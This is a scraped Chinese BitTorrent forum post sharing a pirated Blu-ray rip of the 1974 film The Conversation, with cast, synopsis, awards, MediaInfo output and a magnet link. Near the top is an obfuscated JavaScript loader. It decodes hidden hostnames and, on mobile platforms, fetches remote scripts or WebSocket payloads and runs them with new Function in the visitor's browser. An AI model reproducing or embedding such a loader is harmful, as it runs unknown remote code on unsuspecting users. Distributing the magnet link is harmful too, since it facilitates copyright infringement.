窃听大阴谋[双语字幕].The.Conversation.1974.1080p.BluRay.x265.10bit.DTS 7.02GB

版主小s 1月前 212

var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNw==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x46\x6a\x59\x48\x73\x4f\x52\x52\x45\x59']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9vamxza2pmLm5pYYW5nYYW94aWFuc2hlbmcuYY29t','d3NzOOi8vd3MuaG5qanNoLmNvbTo4MDgwLHdzczovL3dzLnFpbmdsaXh5LmNvbTo4MDgwLHdzczovL3dzLnppb24tbGl2ZXMuY29tOOjgwOODA=',window,document,['Y','O']);}:function(){};

◎译  名 窃听大阴谋 / 对话
◎片  名 The Conversation
◎年  代 1974
◎产  地 美国
◎类  别 剧情 / 悬疑 / 惊悚
◎语  言 英语
◎上映日期 1974-04-07(美国)
◎IMDb链接 https://www.imdb.com/title/tt0071360/
◎豆瓣评分 8.1/10 (10078人评价)
◎豆瓣链接 https://movie.douban.com/subject/1296908/
◎片  长 113 分钟
◎导  演 弗朗西斯·福特·科波拉 Francis Ford Coppola (id:1054419)
◎编  剧 弗朗西斯·福特·科波拉 Francis Ford Coppola (id:1054419)
◎演  员 吉恩·哈克曼 Gene Hackman (id:1004589)
       约翰·凯泽尔 John Cazale (id:1022612)
       艾伦·加菲尔德 Allen Garfield (id:1041328)
       弗雷德里克·福瑞斯特 Frederic Forrest (id:1013982)
       辛迪·威廉姆斯 Cindy Williams (id:1025283)
       迈克尔·希金斯 Michael Higgins (id:1092526)
       伊丽莎白·麦克雷 Elizabeth MacRae (id:1124009)
       特瑞·加尔 Teri Garr (id:1036451)
       哈里森·福特 Harrison Ford (id:1009238)
       马克·惠勒 Mark Wheeler (id:1369158)
       罗伯特·希尔兹 Robert Shields (id:1139216)
       罗伯特·杜瓦尔 Robert Duvall (id:1013776)
       吉安-卡洛·科波拉 Gian-Carlo Coppola (id:1050306)
       拉蒙·比厄里 Ramon Bieri (id:1066900)
       比利·迪·威廉姆斯 Billy Dee Williams (id:1002757)
       Al Nalbandian Al Nalbandian (id:1128374)
       弗朗西斯·福特·科波拉 Francis Ford Coppola (id:1054419)
       弗雷德·鲁斯 Fred Roos (id:1018556)
       大卫·希尔 David Shire (id:1012565)
       比尔·巴特勒 Bill Butler (id:1000839)
       沃尔特·默奇 Walter Murch (id:1009621)
       赵汝钜 Richard Chew (id:1012689)
       迪安·塔沃拉里斯 Dean Tavoularis (id:1045705)
       艾基·盖拉尔德·罗杰尔斯 Aggie Guerard Rodgers (id:1014779)
       Charles Myers Charles Myers (id:1015466)

◎标  签 美国 / 悬疑 / 1974 / 金棕榈 / 犯罪 / 惊悚 / 剧情 / 心理

◎简  介
  哈里·考尔(吉恩·哈克曼 Gene Hackman 饰)在旧金山开了一家侦探公司,他最近的一单生意是去窃听一对男女的对话。他精心地在一个广场附近布下层层的窃听装置,来捕捉这对男女所说的每一句话。窃听进行得很顺利,声音很清晰,但他不理解他们所说的话到底什么意思。 他带着录音文件去雇佣他的公司准备拿他的报酬,却被告知老板不在,便决定暂时不交出录音文件,并退回报酬。他只能小心翼翼地保管着他的录音文件,即使在聚会的时候仍旧提心吊胆,生怕录音文件被人偷走。千防万防,录音文件还是丢失了。心急如焚的哈里只能按照他窃听到的录音内容,于某日来到那对男女口中提到的酒店,却不想他正陷入一场巨大的阴谋中……

◎获奖情况 (共5项)
  第47届奥斯卡金像奖 (1975)
  最佳影片(提名)
   └──弗朗西斯·福特·科波拉 (id:1054419)
  最佳原创剧本(提名)
   └──弗朗西斯·福特·科波拉 (id:1054419)
  最佳音响(提名)

  第27届戛纳电影节 (1974)
  主竞赛单元 金棕榈奖
   └──弗朗西斯·福特·科波拉 (id:1054419)
  天主教人道精神奖-特别提及
   └──弗朗西斯·福特·科波拉 (id:1054419)

  1. ##### MediaInfo ######

  2. General

  3. Unique ID                                : 236698644727996299726206081296834470695 (0xB212803250BF74318171143AF323A327)

  4. Complete name                            : [email protected]OM.mkv

  5. Format                                   : Matroska

  6. Format version                           : Version 4

  7. File size                                : 7.02 GiB

  8. Duration                                 : 1 h 53 min

  9. Overall bit rate                         : 8 828 kb/s

  10. Encoded date                             : UTC 2021-08-13 09:34:58

  11. Writing application                      : mkvmerge v57.0.0 ('Till The End') 64-bit

  12. Writing library                          : libebml v1.4.2 + libmatroska v1.6.4


  13. Video

  14. ID                                       : 1

  15. Format                                   : HEVC

  16. Format/Info                              : High Efficiency Video Coding

  17. Format profile                           : Main [email protected]@Main

  18. Codec ID                                 : V_MPEGH/ISO/HEVC

  19. Duration                                 : 1 h 53 min

  20. Bit rate                                 : 7 250 kb/s

  21. Width                                    : 1 920 pixels

  22. Height                                   : 1 080 pixels

  23. Display aspect ratio                     : 16:9

  24. Frame rate mode                          : Constant

  25. Frame rate                               : 23.976 (24000/1001/53354) FPS

  26. Color space                              : YUV

  27. Chroma subsampling                       : 4:2:0

  28. Bit depth                                : 10 bits

  29. Bits/(Pixel*Frame)                       : 0.146

  30. Stream size                              : 5.76 GiB (82%)

  31. Writing library                          : x265 3.5+2-g2b25c9ba0+45:[Windows][GCC 10.2.0][64 bit] Yuuki 10bit+8bit+12bit

  32. Encoding settings                        : rc=crf / crf=22.0000 / qcomp=0.60 / qpstep=4 / stats-write=0 / stats-read=0 / no-lossless / no-cu-lossless / aq-mode=3 / aq-strength=0.70 / cbqpoffs=0 / crqpoffs=0 / ipratio=1.40 / pbratio=1.30 / psy-rd=2.00 / psy-rdoq=0.00 / deblock=0:0 / ref=6 / limit-refs=1 / no-limit-modes / bframes=8 / b-adapt=2 / bframe-bias=0 / b-pyramid / b-intra / weightp / weightb / min-keyint=24 / max-keyint=240 / rc-lookahead=24 / gop-lookahead=0 / NTMzNTQ=uuDQuD2mJt9fsCf / scenecut=40 / hist-scenecut=0 / radl=0 / max-cu-size=64 / min-cu-size=8 / me=3 / subme=7 / merange=48 / rdoq-level=0 / rd=4 / rdpenalty=0 / dynamic-rd=0.00 / no-rd-refine / ----- / cutree / sao / no-rect / no-amp / no-open-gop / wpp / no-pmode / no-pme / no-psnr / no-ssim / nr-intra=0 / nr-inter=0 / no-constrained-intra / no-strong-intra-smoothing / max-tu-size=32 / tu-inter-depth=1 / tu-intra-depth=1 / limit-tu=0 / qg-size=32 / qpmax=69 / qpmin=0 / ----- / cpuid=533541111039 / frame-threads=5 / numa-pools=+ / log-level=2 / input-csp=1 / input-res=1920x1080 / interlace=0 / level-idc=0 / high-tier=1 / uhd-bd=0 / no-allow-non-conformance / no-repeat-headers / aud / no-hrd / info / hash=0 / no-temporal-layers / lookahead-slices=0 / no-splice / no-intra-refresh / no-ssim-rd / signhide / no-tskip / max-merge=3 / temporal-mvp / no-frame-dup / no-hme / no-analyze-src-pics / no-sao-non-deblock / selective-sao=4 / early-skip / rskip / no-fast-intra / no-tskip-fast / no-splitrd-skip / zone-count=0 / no-strict-cbr / no-rc-grain / no-const-vbv / sar=0 / overscan=0 / videoformat=5 / range=0 / colorprim=2 / transfer=2 / colormatrix=2 / chromaloc=0 / display-window=0 / cll=0,0 / min-luma=0 / max-luma=1023 / log2-max-poc-lsb=8 / vui-timing-info / vui-hrd-info / slices=1 / no-opt-qp-pps / no-opt-ref-list-length-pps / no-multi-pass-opt-rps / scenecut-bias=0.05 / hist-threshold=0.03 / no-opt-cu-delta-qp / no-aq-motion / no-hdr10 / no-hdr10-opt / no-dhdr10-opt / no-idr-recovery-sei / analysis-reuse-level=0 / analysis-save-reuse-level=0 / analysis-load-reuse-level=0 / scale-factor=0 / refine-intra=0 / refine-inter=0 / refine-mv=1 / refine-ctu-distortion=0 / no-limit-sao / ctu-info=0 / no-lowpass-dct / refine-analysis-type=0 / copy-pic=1 / max-ausize-factor=1.0 / no-dynamic-refine / no-single-sei / no-hevc-aq / no-svt / no-field / qp-adaptation-range=1.00 / scenecut-aware-qp=0conformance-window-offsets / right=0 / bottom=0 / NTMzNTQ= / decoder-max-rate=0 / no-vbv-live-multi-pass

  33. Language                                 : English

  34. Default                                  : Yes

  35. Forced                                   : No


  36. Audio

  37. ID                                       : 2

  38. ID in the original source medium         : 4352 (0x1100)

  39. Format                                   : DTS

  40. Format/Info                              : Digital Theater Systems

  41. Codec ID                                 : A_DTS

  42. Duration                                 : 1 h 53 min

  43. Bit rate mode                            : Constant

  44. Bit rate                                 : 1 509 kb/s

  45. Channel(s)                               : 6 channels

  46. Channel layout                           : C L R Ls Rs LFE

  47. Sampling rate                            : 48.0 kHz

  48. Frame rate                               : 93.750 FPS (512 SPF)

  49. Bit depth                                : 24 bits

  50. Compression mode                         : Lossy

  51. Stream size                              : 1.20 GiB (17%)

  52. Language                                 : English

  53. Default                                  : Yes

  54. Forced                                   : No

  55. Original source medium                   : Blu-ray


  56. Text #1

  57. ID                                       : 3

  58. ID in the original source medium         : 4611 (0x1203)

  59. Format                                   : PGS

  60. Muxing mode                              : zlib

  61. Codec ID                                 : S_HDMV/PGS

  62. Codec ID/Info                            : Picture based subtitle format used on BDs/HD-DVDs

  63. Duration                                 : 1 h 47 min

  64. Bit rate                                 : 40.3 kb/s

  65. Count of elements                        : 2900

  66. Stream size                              : 30.9 MiB (0%)

  67. Title                                    : chs&eng

  68. Language                                 : Chinese

  69. Default                                  : Yes

  70. Forced                                   : No

  71. Original source medium                   : Blu-ray


  72. Text #2

  73. ID                                       : 4

  74. ID in the original source medium         : 4612 (0x1204)

  75. Format                                   : PGS

  76. Muxing mode                              : zlib

  77. Codec ID                                 : S_HDMV/PGS

  78. Codec ID/Info                            : Picture based subtitle format used on BDs/HD-DVDs

  79. Duration                                 : 1 h 47 min

  80. Bit rate                                 : 40.7 kb/s

  81. Count of elements                        : 2900

  82. Stream size                              : 31.2 MiB (0%)

  83. Title                                    : cht&eng

  84. Language                                 : Chinese

  85. Default                                  : No

  86. Forced                                   : No

  87. Original source medium                   : Blu-ray


  88. Text #3

  89. ID                                       : 5

  90. ID in the original source medium         : 4613 (0x1205)

  91. Format                                   : PGS

  92. Muxing mode                              : zlib

  93. Codec ID                                 : S_HDMV/PGS

  94. Codec ID/Info                            : Picture based subtitle format used on BDs/HD-DVDs

  95. Duration                                 : 1 h 47 min

  96. Bit rate                                 : 23.9 kb/s

  97. Count of elements                        : 2900

  98. Stream size                              : 18.3 MiB (0%)

  99. Title                                    : chs

  100. Language                                 : Chinese

  101. Default                                  : No

  102. Forced                                   : No

  103. Original source medium                   : Blu-ray


  104. Text #4

  105. ID                                       : 6

  106. ID in the original source medium         : 4614 (0x1206)

  107. Format                                   : PGS

  108. Muxing mode                              : zlib

  109. Codec ID                                 : S_HDMV/PGS

  110. Codec ID/Info                            : Picture based subtitle format used on BDs/HD-DVDs

  111. Duration                                 : 1 h 47 min

  112. Bit rate                                 : 24.3 kb/s

  113. Count of elements                        : 2900

  114. Stream size                              : 18.6 MiB (0%)

  115. Title                                    : cht

  116. Language                                 : Chinese

  117. Default                                  : No

  118. Forced                                   : No

  119. Original source medium                   : Blu-ray


  120. Text #5

  121. ID                                       : 7

  122. ID in the original source medium         : 4608 (0x1200)

  123. Format                                   : PGS

  124. Muxing mode                              : zlib

  125. Codec ID                                 : S_HDMV/PGS

  126. Codec ID/Info                            : Picture based subtitle format used on BDs/HD-DVDs

  127. Duration                                 : 1 h 43 min

  128. Bit rate                                 : 33.5 kb/s

  129. Count of elements                        : 2216

  130. Stream size                              : 24.9 MiB (0%)

  131. Language                                 : English

  132. Default                                  : No

  133. Forced                                   : No

  134. Original source medium                   : Blu-ray


  135. Menu

  136. 00:00:00.000                             : 第 01 章

  137. 00:09:09.465                             : 第 02 章

  138. 00:13:55.626                             : 第 03 章

  139. 00:20:08.874                             : 第 04 章

  140. 00:28:26.913                             : 第 05 章

  141. 00:33:12.323                             : 第 06 章

  142. 00:41:41.790                             : 第 07 章

  143. 00:52:22.305                             : 第 08 章

  144. 01:11:33.497                             : 第 09 章

  145. 01:21:45.901                             : 第 10 章

  146. 01:30:13.866                             : 第 11 章

  147. 01:42:00.405                             : 第 12 章




TAGS 剧情 惊悚 悬疑

磁力链:
  • magnet:?xt=urn:btih:CF3D7E249C8F8C7E3158CEA2175740A5A3BAAA08
上传的附件:

BT9527.com论坛第一帅,不接受任何反驳
BT9527电影天堂 1、BT9527电影天堂提供的BT文件均来源于互联网抓取,只供网友学习交流、技术提升使用。
2、我们遵守BitTorrent点对点协议原则,任何版权问题请联系原资源发布商,我们不处理任何版权纠纷,谢谢!如有争议请联系邮箱:BT9527#hotmail.com(#换成@)
3、如果您发现某页面或地址有错误,请联系站长邮箱BT9527#hotmail.com(#换成@),我们会尽快处理。您的热心是对BT9527电影天堂最大的支持。
4、本站建议去正规影院观看电影以支持电影行业发展。

最新回复 (0)

你可以在 登录 or 注册 后,对此帖发表评论!

返回